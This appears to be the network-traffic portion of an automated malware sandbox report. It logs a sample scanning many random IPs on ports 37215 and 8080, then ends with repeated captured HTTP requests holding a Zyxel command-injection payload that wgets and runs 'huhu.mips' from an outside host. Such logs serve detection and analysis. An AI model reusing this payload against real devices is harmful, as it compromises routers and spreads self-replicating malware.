            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.24.68.48:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 66.165.109.82:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.116.115.47:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.67.149.139:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.150.190.50:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 95.192.134.234:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.183.49.241:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.5.87.112:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.151.175.137:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.239.144.7:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.28.139.85:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 159.24.161.175:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.200.130.204:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.33.86.125:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.225.52.64:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.182.195.251:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.209.102.225:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.115.68.101:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.98.34.181:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.37.202.211:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 1.46.243.245:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.85.6.131:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 80.19.131.185:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.235.176.242:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.214.216.160:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.106.105.151:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.199.152.200:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.255.59.210:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.245.66.44:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.42.126.65:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 166.56.200.106:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 212.143.145.14:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 133.99.141.81:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.142.118.69:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.76.141.190:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.68.150.122:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.193.111.235:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 180.186.145.80:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.32.255.205:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 85.99.81.2:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.116.54.213:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 47.94.82.220:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 206.103.231.240:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.229.164.139:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.89.197.198:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.118.34.173:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.191.145.55:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.237.182.201:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 87.24.25.48:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 72.209.164.165:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.213.122.120:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.163.117.185:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.241.139.76:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 4.177.102.29:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 150.64.35.194:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.19.181.203:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 142.191.24.233:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.215.121.88:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.248.235.214:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 202.196.204.16:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.63.187.81:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 161.35.103.177:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 171.35.162.65:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.142.111.30:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.234.46.18:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.125.179.185:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.57.184.82:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.67.65.172:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.77.153.110:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.227.33.66:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 93.86.231.22:37215
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 147.132.233.53:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 17.90.125.87:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 75.187.230.134:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 138.48.181.74:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 146.135.214.147:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 142.69.26.100:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 12.212.157.18:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 157.95.206.145:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 101.252.183.216:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 83.84.216.121:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 90.125.235.144:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 176.79.62.202:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 177.217.82.128:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 103.46.183.37:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 122.226.202.19:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 154.196.46.58:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 48.36.227.8:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 171.126.124.24:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 91.178.20.255:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 220.61.135.214:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 146.108.43.114:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 18.40.45.225:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 80.85.57.144:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 39.107.99.110:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 165.180.49.85:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 105.65.44.180:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 217.55.56.198:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 160.213.126.192:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 200.206.8.177:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 188.170.150.118:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 72.176.143.239:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 191.21.34.165:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 110.233.74.255:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 216.115.213.122:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 219.247.68.199:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 46.154.206.4:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 137.196.72.42:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 203.141.71.16:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 152.254.242.2:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 200.162.204.156:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 77.141.46.55:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 32.81.240.47:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 58.194.9.129:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 142.190.167.213:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 37.2.254.110:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 205.88.235.247:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 78.53.115.133:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 135.5.45.149:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 65.84.199.56:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 179.127.217.163:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 104.224.178.191:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 178.184.232.147:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 80.153.135.132:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 5.169.131.132:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 182.179.55.138:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 140.235.214.100:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 195.127.178.137:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 69.250.175.118:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 92.93.20.167:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 188.52.247.229:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 9.33.154.103:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 65.195.190.61:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 86.156.61.42:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 8.254.70.112:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 50.186.118.132:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 12.38.125.212:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 18.214.232.24:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 107.70.26.187:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 194.180.27.253:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 39.193.26.188:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 208.222.135.115:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 146.5.107.243:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 86.98.87.226:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 159.146.167.229:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 14.171.213.113:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 18.94.10.204:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 166.100.178.121:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 204.199.121.43:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 78.240.227.148:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 41.241.12.238:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 216.177.188.232:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 90.42.108.25:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 202.62.165.194:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 223.206.201.52:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 25.195.104.184:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 174.86.65.22:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 209.247.189.198:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 34.155.191.32:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 59.65.16.73:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 103.96.231.200:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 126.154.242.23:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 36.82.193.189:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 60.168.80.66:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 200.125.216.154:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 217.230.174.58:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 116.35.131.173:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 73.125.42.69:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 168.143.186.56:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 46.77.31.156:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 81.23.43.170:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 85.4.214.144:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 157.38.137.49:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 110.208.68.232:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 126.132.57.87:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 73.226.193.250:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 173.177.196.9:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 8.185.141.111:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 150.232.95.8:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 86.72.102.47:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 118.70.172.144:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 85.172.89.120:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 160.162.10.233:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 75.103.245.19:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 118.9.190.169:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 34.65.110.7:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 169.128.44.16:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 113.140.61.11:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 1.176.118.72:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 89.140.196.83:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 185.175.230.232:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 138.215.211.161:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 71.196.226.163:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 66.191.139.125:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 4.239.19.237:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 99.34.156.101:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 194.250.229.239:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 36.171.173.251:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 91.181.168.218:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 211.93.226.98:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 103.97.53.22:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 90.213.140.0:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 129.33.157.64:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 145.194.60.104:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 217.122.197.216:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 105.180.132.77:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 108.7.140.14:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 36.184.50.39:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 23.53.8.187:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 92.113.104.77:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 152.57.86.18:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 90.131.91.142:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 17.28.158.235:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 160.93.249.198:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 155.246.249.164:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 169.243.179.148:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 180.167.122.200:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 61.249.0.208:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 58.116.229.104:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 12.71.194.91:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 19.191.220.78:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 12.4.44.120:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 92.161.201.144:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 165.63.253.7:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 165.114.110.112:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 208.156.104.153:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 78.79.34.242:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 42.36.124.171:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 37.219.229.229:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 165.122.192.25:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 4.176.135.190:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 2.223.79.178:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 206.211.26.24:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 73.49.123.88:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 195.62.32.199:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 38.108.120.18:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 46.29.222.123:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 160.6.71.127:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 105.252.233.101:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 51.6.251.89:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 93.98.222.84:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 8.110.188.184:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 52.44.63.61:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 68.167.49.170:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 48.222.188.171:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 198.51.33.244:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 132.159.112.136:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 179.74.122.43:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 94.77.80.98:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 43.134.144.122:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 14.126.86.195:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 23.155.128.198:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 17.55.117.87:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 191.171.190.141:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 18.70.114.242:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 177.184.80.125:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 139.58.12.15:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 179.101.9.68:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 167.211.244.157:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 107.169.215.8:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 83.180.245.89:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 5.71.164.45:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 54.32.41.130:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 181.173.102.60:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 107.216.142.234:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 105.136.40.211:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 31.165.37.122:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 75.248.139.8:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 152.98.47.37:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 163.141.143.80:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 110.59.117.120:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 145.75.176.84:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 148.231.180.127:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 72.165.55.82:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 65.36.76.13:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 89.193.147.124:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 193.85.105.34:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 134.255.22.92:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 140.22.148.36:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 145.74.206.14:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 209.36.237.26:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 78.25.246.236:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 93.100.201.74:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 132.177.101.250:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 181.67.8.234:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 103.105.19.224:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 125.14.59.184:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 41.3.231.248:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 162.59.220.156:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 200.76.211.57:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 179.178.143.195:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 211.32.229.17:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 25.54.67.99:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 221.48.24.193:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 44.110.136.213:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 159.225.91.121:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 54.67.124.145:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 213.133.36.97:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 129.170.166.189:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 67.194.127.166:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 31.25.107.79:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 44.29.171.59:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 176.49.83.71:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 134.73.111.161:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 102.160.250.45:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 65.51.193.114:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 41.250.203.142:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 59.244.180.152:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 43.120.161.100:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 19.243.110.69:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 93.181.96.10:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 9.21.246.166:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 219.170.209.64:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 140.104.234.14:8080
            Source: global trafficTCP traffic: 192.168.2.15:18347 -> 195.140.38.12:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
